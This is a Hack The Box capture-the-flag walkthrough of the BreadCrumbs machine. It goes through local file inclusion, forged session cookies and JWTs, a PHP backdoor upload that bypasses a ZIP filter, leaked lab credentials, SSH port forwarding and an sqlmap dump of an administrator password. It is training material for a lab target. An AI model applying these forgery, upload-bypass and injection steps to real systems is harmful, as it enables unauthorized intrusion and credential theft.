Hackthebox BreadCrumbs walkthrough
Methodology
- Enumeration by LFI
- Phpsessid and Jwt token forge
- unrestricted upload
- Database leak
- Binary file analysis
- Port forwarding
- Database dump with SQLMAP
โโโ(root๐m19o)-[~/HTB/Breadcrumbs]
โโ# nmap -sV -v -p- --min-rate=10000 10.10.10.228
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
445/tcp open microsoft-ds?
3306/tcp open mysql?
5040/tcp open unknown
7680/tcp open pando-pub?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=2/23%Time=6034FA27%P=x86_64-pc-linux-gnu%r(RP
SF:CCheck,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe
SF:,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enumeration
As a penetartion tester you should analyze the application to understand the functionality of it
So now let`s check what that button does.
From that page we can understand that the application is for reading books and that button checks for books with title and author name
Let`s see how does the application search for books
So i started to test the searching with random word, in my case i used test to understand the behavior
I got nothing from that, so i will start my proxy "Burpsuite" to intercept that request
After intercepting the request as you can see there is another parameter called "method" we couldn`t see before, now let`s change method value to 1
I managed to generate an error by changing the method value to 1
The first line error says there is a missing key in the array called book and the second line error says that file_get_content method can`t find the file, so what if we gave it a file to open ?
So now we got LFI , Files.php says that we need to get paul session to login
Let`s see how this application generates a cookie
So now we got the code that generates the cookie, let`s get paul`s cookie
$username="paul";
$max =3;
$seed = rand(0, $max);
foreach (range(0, $max) as $seed) {
$key = "s4lTy_stR1nG_".$username[$seed]."(!528./9890";
$session_cookie = $username.md5($key);
}
echo $session_cookie;>
paul47200b180ccd6835d25d034eeb6e6390
Now we got our cookie
Let`s change it and login
Now we got access
Let`s check all the tabs and see what we can get
So i can upload now ! , Let`s check how it works
It says there is a key called token is missing, i need to generate a token , let`s see how we can have one.
As you can see login.php uses authController.php to validate , now let`s see authcontroller.php content.
Now i can generate our token
To generate a token we need payload and secret key as mentioned , out payload load is a Multidimensional Array , { "data" { "username" : "paul" } }
$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';
<
Token= eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Let`s upload the backdoor
It accepts ZIP files only, so upload a zip file and change it`s content with PHP backdoor and change the tipe to PHP in the filename and in the end of the request too
Foothold
Let`s start enumeration from inside, Upload dir is "Portal/Uploads" you will find your backdoor there
There is an interesting fold name pizzaDeliveryUserData, let`s check it.
That`s juicy, All users data but it looks like that only one user is enabled, that user is juliette, let`s check that file.
Got creds now !!
User Flag
Let`s continue enumeration
Microsoft stickynote contains juciy info, let`s check it
Database files we need to open it on our machine to check it
You can download the files with more than way, use what you like
In my case i used SCP to get the files
Usage :
scp "file you want to download" user@0.0.0.0:path "Your ip and where you want to download it"
Lateral Movment
After downloading the files look What i got !
juliette: jUli901./())!
development: fN3)sN5Ee@g
administrator: [MOVED]
Laterl Movment DONE
Privilege Escalation
What Development user have for?
I tried type ./Krypter_linux and that what it gave me
That`s looks like a SQL statement, we need SQLMAP NOW !!
PS C:\Development> curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -UseBasicParsing
StatusCode : 200
StatusDescription : OK
Content : selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}
RawContent : HTTP/1.1 200 OK
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 96
Content-Type: text/html; charset=UTF-8
Date: Tue, 23 Feb 2021 19:24:09 GMT
Server: Apache/2.4.46 (Win64) ...
Forms :
Headers : {[Keep-Alive, timeout=5, max=100], [Connection, Keep-Alive], [Content-Length, 96], [Content-Type,
text/html; charset=UTF-8]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml :
RawContentLength : 96
To use SQLMAP we need to use port forwarding
In my case i used SSH
ssh -N -L 1234:127.0.0.1:1234 development@10.10.10.228
โโโ(root๐kali)-[~/HTB/Breadcrumbs]
โโ# curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords'
selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}
Let`s ROLL
sqlmap -u http://127.0.0.1:1234/index.php\?method\=select\&username\=administrator\&table\=passwords --dump
Database: bread
Table: passwords
[1 entry]
+----+---------------+------------------+----------------------------------------------+
| id | account | aes_key | password |
+----+---------------+------------------+----------------------------------------------+
| 1 | Administrator | k19D193j.<19391( | H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw= |
+----+---------------+------------------+----------------------------------------------+
Now we need to decrypt the password
So we need to use base64 decode and after that we need to use aes decrypt with the key we got
You can use this link to decrypt it
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',false)AES_Decrypt(%7B'option':'Latin1','string':'k19D193j.%3C19391('%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':'undefined'%7D)&input=SDJkRnovak53dFNUV0RVUm90OUpCaFdNUDZYT2RtY3BncXZZSEczNVFLdz0
ROOT Flag
